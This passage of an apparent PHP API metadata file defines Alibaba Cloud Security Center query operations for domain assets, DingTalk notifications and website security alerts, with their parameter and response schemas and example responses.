'proxy_01_03', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'F9FCB51A-5078-5D31-9C4D-3B25BEF068C7', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the default installation version of the hybrid cloud proxy', 'summary' => 'Queries the default installation version of the hybrid cloud proxy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDefaultProxyInstallVersion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDefaultProxyInstallVersion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InstallVersion\\": \\"proxy_01_03\\",\\n \\"RequestId\\": \\"F9FCB51A-5078-5D31-9C4D-3B25BEF068C7\\"\\n}","type":"json"}]', ], 'DescribeDingTalk' => [ 'summary' => 'Retrieves the list of DingTalk notifications.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RuleActionName', 'in' => 'query', 'schema' => ['description' => 'The notification name.', 'type' => 'string', 'required' => false, 'example' => 'TestRuleAction', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of notifications to display per page in a paged query. Default value: **20**, which indicates that up to 20 entries are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'B256A525-7E42-4BB9-A27C-9017FDDFF1A2', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ActionList' => [ 'description' => 'The notification list.', 'type' => 'array', 'items' => [ 'description' => 'The notification information.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The notification status. Valid values:'."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ConfigList' => ['description' => 'The notification scope configuration for messages. The value is a JSON string that contains the following fields:'."\n" ."\n" .'- **type**: the notification type.'."\n" .'- **configItemList**: the notification scope.', 'type' => 'string', 'example' => '[{"type":"sas_analysis_pre-sas-operation-log-sas-event-suspicious","configItemList":[{"key":"item_level","valueList":["all"]}]},{"type":"sas_analysis_pre-sas-operation-log-sas-event-hc","configItemList":[{"key":"item_level","valueList":["all"]}]}]', 'title' => ''], 'GmtCreate' => ['description' => 'The creation timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1550828400000', 'title' => ''], 'ActionName' => ['description' => 'The notification name.', 'type' => 'string', 'example' => 'TestRuleAction', 'title' => ''], 'Url' => ['description' => 'The notification parameter.', 'type' => 'string', 'example' => 'https://oapi.dingtalk.com/robot/send', 'title' => ''], 'AliUid' => ['description' => 'The UID of the user.', 'type' => 'integer', 'format' => 'int64', 'example' => '12312412341', 'title' => ''], 'DingTalkLang' => ['description' => 'The language of the notification. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'example' => 'zh', 'title' => ''], 'IntervalTime' => ['description' => 'The time interval. Unit: minutes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1000', 'title' => ''], 'GmtModified' => ['description' => 'The modification time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1550828400000', 'title' => ''], 'GroupIdList' => ['description' => 'The list of group IDs.', 'type' => 'string', 'example' => '"123,456"', 'title' => ''], 'Id' => ['description' => 'The notification message ID.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve dingTalk notification list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDingTalk'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDingTalk', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B256A525-7E42-4BB9-A27C-9017FDDFF1A2\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149\\n },\\n \\"ActionList\\": [\\n {\\n \\"Status\\": 0,\\n \\"ConfigList\\": \\"[{\\\\\\"type\\\\\\":\\\\\\"sas_analysis_pre-sas-operation-log-sas-event-suspicious\\\\\\",\\\\\\"configItemList\\\\\\":[{\\\\\\"key\\\\\\":\\\\\\"item_level\\\\\\",\\\\\\"valueList\\\\\\":[\\\\\\"all\\\\\\"]}]},{\\\\\\"type\\\\\\":\\\\\\"sas_analysis_pre-sas-operation-log-sas-event-hc\\\\\\",\\\\\\"configItemList\\\\\\":[{\\\\\\"key\\\\\\":\\\\\\"item_level\\\\\\",\\\\\\"valueList\\\\\\":[\\\\\\"all\\\\\\"]}]}]\\",\\n \\"GmtCreate\\": 1550828400000,\\n \\"ActionName\\": \\"TestRuleAction\\",\\n \\"Url\\": \\"https://oapi.dingtalk.com/robot/send\\",\\n \\"AliUid\\": 12312412341,\\n \\"DingTalkLang\\": \\"zh\\",\\n \\"IntervalTime\\": 1000,\\n \\"GmtModified\\": 1550828400000,\\n \\"GroupIdList\\": \\"\\\\\\"123,456\\\\\\"\\",\\n \\"Id\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDomainCount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.172.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RootDomainsCount' => ['description' => 'The number of root domains in the assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C286491D-4A2F-589A-B63B-D2AD3DA9BD71', 'title' => ''], 'SubDomainsCount' => ['description' => 'The number of subdomains in the assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'TotalDomainsCount' => ['description' => 'The total number of domain name assets returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query domain name asset count', 'summary' => 'Queries the number of your domain name assets.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RootDomainsCount\\": 5,\\n \\"RequestId\\": \\"C286491D-4A2F-589A-B63B-D2AD3DA9BD71\\",\\n \\"SubDomainsCount\\": 5,\\n \\"TotalDomainsCount\\": 10\\n}","type":"json"}]', ], 'DescribeDomainDetail' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'DomainName', 'in' => 'query', 'schema' => ['description' => 'The name of the domain name or website to query.'."\n" ."\n" .'> Fuzzy match is not supported. Enter the complete domain name or website name.', 'type' => 'string', 'required' => true, 'example' => 'example.com', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Domain' => ['description' => 'The domain name.', 'type' => 'string', 'example' => 'example.com', 'title' => ''], 'RequestId' => ['description' => 'The request ID. The China value is a unique identifier that Alibaba Cloud generates for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3A85CFCF-05C8-451A-9E41-C0D5E96BA407', 'title' => ''], 'VulCount' => ['description' => 'The total number of vulnerabilities in your website assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AlarmCount' => ['description' => 'The total number of alerts in your website assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RootDomain' => ['description' => 'The root domain name that corresponds to the domain name.', 'type' => 'string', 'example' => 'example.com', 'title' => ''], 'DomainDetailItems' => [ 'description' => 'The asset information related to the domain name.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => 'lb-bp1g9dohoyin9cjhn6****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the asset.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset.', 'type' => 'string', 'example' => 'iZm5e6w7dzsktt6mz4yimeZ-6****', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 'i-m5e6w7dzsktt6mz4***', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'AssetType' => ['description' => 'The Asset Type of the asset under the domain name. Valid values:'."\n" ."\n" .'- **0**: ECS'."\n" .'- **1**: load balancing'."\n" .'- **2**: NAT gateway'."\n" .'- **3**: RDS database'."\n" .'- **4**: MongoDB database', 'type' => 'string', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataExists', 'errorMessage' => '%s data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query domain name asset details', 'summary' => 'Queries the details of your domain name assets.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Domain\\": \\"example.com\\",\\n \\"RequestId\\": \\"3A85CFCF-05C8-451A-9E41-C0D5E96BA407\\",\\n \\"VulCount\\": 2,\\n \\"AlarmCount\\": 2,\\n \\"RootDomain\\": \\"example.com\\",\\n \\"DomainDetailItems\\": [\\n {\\n \\"Uuid\\": \\"lb-bp1g9dohoyin9cjhn6****\\",\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"InstanceName\\": \\"iZm5e6w7dzsktt6mz4yimeZ-6****\\",\\n \\"InstanceId\\": \\"i-m5e6w7dzsktt6mz4***\\",\\n \\"IntranetIp\\": \\"1.2.XX.XX\\",\\n \\"AssetType\\": \\"0\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDomainList' => [ 'summary' => 'Queries information about your domain name assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.122.XX.XX', 'title' => ''], ], [ 'name' => 'FuzzyDomain', 'in' => 'query', 'schema' => ['description' => 'The search keyword for the domain name to query. Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'DomainType', 'in' => 'query', 'schema' => ['description' => 'The type of the domain name to query. Valid values:'."\n" ."\n" .'- **root**: root domain name'."\n" .'- **sub**: subdomain name.', 'type' => 'string', 'required' => false, 'example' => 'root', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of domain names to display on each page in a paged query. Default value: **10**, which indicates that 10 domain names are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return in a paged query. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'PageSize' => ['description' => 'The number of domain names displayed on each page in a paged query. Default value: **10**, which indicates that 10 domain names are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of domain names returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '27', 'title' => ''], 'Count' => ['description' => 'The number of domain names displayed on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'DomainListResponseList' => [ 'description' => 'The list of domain name asset information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'IpList' => ['description' => 'The IP address information associated with the domain name.', 'type' => 'string', 'example' => '1.2.XX.XX,1.0.XX.XX', 'title' => ''], 'Domain' => ['description' => 'The domain name or website name.', 'type' => 'string', 'example' => 'example.com', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query domain name asset information', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 10,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 27,\\n \\"Count\\": 10\\n },\\n \\"DomainListResponseList\\": [\\n {\\n \\"IpList\\": \\"1.2.XX.XX,1.0.XX.XX\\",\\n \\"Domain\\": \\"example.com\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDomainSecureAlarmList' => [ 'summary' => 'Queries security alert data from a website security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '139.227.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response messages. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set this parameter to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '42', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], 'AlarmList' => [ 'description' => 'The list of security alerts for website assets.', 'type' => 'array', 'items' => [ 'description' => 'The list of security alerts for website assets.', 'type' => 'object', 'properties' => [ 'Dealed' => ['description' => 'Indicates whether the alert event has been handled. Valid values:'."\n" .'- **N**: Pending.'."\n" .'- **Y**: Handled.', 'type' => 'boolean', 'example' => 'y', 'title' => ''], 'Stages' => ['description' => 'The stage of the attack or intrusion.', 'type' => 'string', 'example' => '[\\"authority_maintenance\\"]'."\n", 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '95.214.*.*', 'title' => ''], 'SuspiciousEventCount' => ['description' => 'The total number of security alerts for your website assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GmtModified' => ['description' => 'The time when the alert event was last modified.', 'type' => 'integer', 'format' => 'int64', 'example' => '1656901794000', 'title' => ''], 'AlarmEventNameOriginal' => ['description' => 'The original parent name of the alert event.', 'type' => 'string', 'example' => 'login_common_location', 'title' => ''], 'AlarmUniqueInfo' => ['description' => 'The unique identifier of the alert event.', 'type' => 'string', 'example' => '8df914418f4211fbf756efe7a6f4****', 'title' => ''], 'CanCancelFault' => ['description' => 'Indicates whether the alert event can be unmarked as a false positive. Valid values:'."\n" ."\n" .'- **true**: Can be unmarked.'."\n" .'- **false**: Cannot be unmarked.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'SecurityEventIds' => ['description' => 'The IDs of the alert events associated with the alert event.', 'type' => 'string', 'example' => '270789', 'title' => ''], 'CanBeDealOnLine' => ['description' => 'Indicates whether the alert event can be handled online, such as blocking, adding to a whitelist, or ignoring. Valid values:'."\n" ."\n" .'- **true**: Can be handled online.'."\n" .'- **false**: Cannot be handled online.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Description' => ['description' => 'The description of the alert event.', 'type' => 'string', 'example' => 'The detection model finds that there is a Trojan horse program on your server. The Trojan horse program is a program specially used to invade the user\'s host. Generally, it will download and release another malicious program after being implanted into the system through disguise.', 'title' => ''], 'ContainHwMode' => ['description' => 'Indicates whether the alert event contains the critical event protection mode.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset instance affected by the alert event.', 'type' => 'string', 'example' => 'TestInstance', 'title' => ''], 'SaleVersion' => ['description' => 'The edition of Security Center that supports the detection of the alert event. Valid values:'."\n" .'- **0**: Basic edition.'."\n" .'- **1**: Advanced edition.'."\n" .'- **2**: Enterprise edition.', 'type' => 'string', 'example' => '1', 'title' => ''], 'OperateErrorCode' => ['description' => 'The result code of the alert event handling.', 'type' => 'string', 'example' => 'kill_and_quara.Success', 'title' => ''], 'Solution' => ['description' => 'The solution for the alert event.', 'type' => 'string', 'example' => 'A malicious program implanted by hacker after intrusion will occupy your bandwidth and attack other servers, and may affect you own service. The malicious process may also have self-deleting behavior or disguise as a system service to evade detection. ', 'title' => ''], 'DataSource' => ['description' => 'The data source of the alert event.', 'type' => 'string', 'example' => 'aegis_****', 'title' => ''], 'HasTraceInfo' => ['description' => 'Indicates whether the alert event has tracing information. Valid values:'."\n" ."\n" .'- **true**: Has tracing information.'."\n" .'- **false**: Does not have tracing information.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OperateTime' => ['description' => 'The timestamp when the alert event was handled. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1631699497000', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the asset instance affected by the alert event.', 'type' => 'string', 'example' => 'i-e****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset instance affected by the alert event.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'EndTime' => ['description' => 'The timestamp of the most recent occurrence of the alert event. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1543740301000', 'title' => ''], 'StartTime' => ['description' => 'The start timestamp of the alert event. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1543740301000', 'title' => ''], 'Uuid' => ['description' => 'The unique identifier of the instance associated with the alert event.', 'type' => 'string', 'example' => '47900178-885d-4fa4-9d77-****', 'title' => ''], 'AlarmEventType' => ['description' => 'The type of the alert event.', 'type' => 'string', 'example' => 'Malicious Software', 'title' => ''], 'AutoBreaking' => ['description' => 'Indicates whether automatic defense is enabled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'AlarmEventName' => ['description' => 'The name of the alert event.', 'type' => 'string', 'example' => 'Trojan', 'title' => ''], 'Level' => ['description' => 'The risk level of the alert event. Valid values:'."\n" .'- **serious**: Critical.'."\n" .'- **suspicious**: Suspicious.'."\n" .'- **remind**: Reminder.', 'type' => 'string', 'example' => 'serious', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security alert data from a website security report', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDomainSecureAlarmList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 42,\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\",\\n \\"AlarmList\\": [\\n {\\n \\"Dealed\\": true,\\n \\"Stages\\": \\"[\\\\\\\\\\\\\\"authority_maintenance\\\\\\\\\\\\\\"]\\\\n\\",\\n \\"InternetIp\\": \\"95.214.*.*\\",\\n \\"SuspiciousEventCount\\": 1,\\n \\"GmtModified\\": 1656901794000,\\n \\"AlarmEventNameOriginal\\": \\"login_common_location\\",\\n \\"AlarmUniqueInfo\\": \\"8df914418f4211fbf756efe7a6f4****\\",\\n \\"CanCancelFault\\": false,\\n \\"SecurityEventIds\\": \\"270789\\",\\n \\"CanBeDealOnLine\\": true,\\n \\"Description\\": \\"The detection model finds that there is a Trojan horse program on your server. The Trojan horse program is a program specially used to invade the user\'s host. Generally, it will download and release another malicious program after being implanted into the system through disguise.\\",\\n \\"ContainHwMode\\": true,\\n \\"InstanceName\\": \\"TestInstance\\",\\n \\"SaleVersion\\": \\"1\\",\\n \\"OperateErrorCode\\": \\"kill_and_quara.Success\\",\\n \\"Solution\\": \\"A malicious program implanted by hacker after intrusion will occupy your bandwidth and attack other servers, and may affect you own service. The malicious process may also have self-deleting behavior or disguise as a system service to evade detection. \\",\\n \\"DataSource\\": \\"aegis_****\\",\\n \\"HasTraceInfo\\": true,\\n \\"OperateTime\\": 1631699497000,\\n \\"InstanceId\\": \\"i-e****\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"EndTime\\": 1543740301000,\\n \\"StartTime\\": 1543740301000,\\n \\"Uuid\\": \\"47900178-885d-4fa4-9d77-****\\",\\n \\"AlarmEventType\\": \\"Malicious Software\\",\\n \\"AutoBreaking\\": true,\\n \\"AlarmEventName\\": \\"Trojan\\",\\n \\"Level\\": \\"serious\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDomainSecureRiskList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '124.78.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set the value to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'NoSslCount' => ['description' => 'The number of websites without certificates.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F****', 'title' => ''], 'RiskCount' => ['description' => 'The number of risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskList' => [ 'description' => 'The risk list.', 'type' => 'array', 'items' => [ 'description' => 'The risk list.', 'type' => 'object', 'properties' => [ 'SslBrand' => ['description' => 'The certificate issuer.', 'type' => 'string', 'example' => 'globalsign', 'title' => ''], 'SslStatus' => ['description' => 'Indicates whether a certificate is configured. Valid values:'."\n" .'- **1**: Yes'."\n" .'- **0**: No.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Domain' => ['description' => 'The domain name.', 'type' => 'string', 'example' => 'test.com', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AlarmCount' => ['description' => 'The number of alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'UuidList' => [ 'description' => 'The list of server UUIDs associated with the asset.', 'type' => 'array', 'items' => ['description' => 'The UUID of the backend server of the website.', 'type' => 'string', 'example' => 'd033b152-b8c0-48e0-8980-29f2e52bxxxx', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller 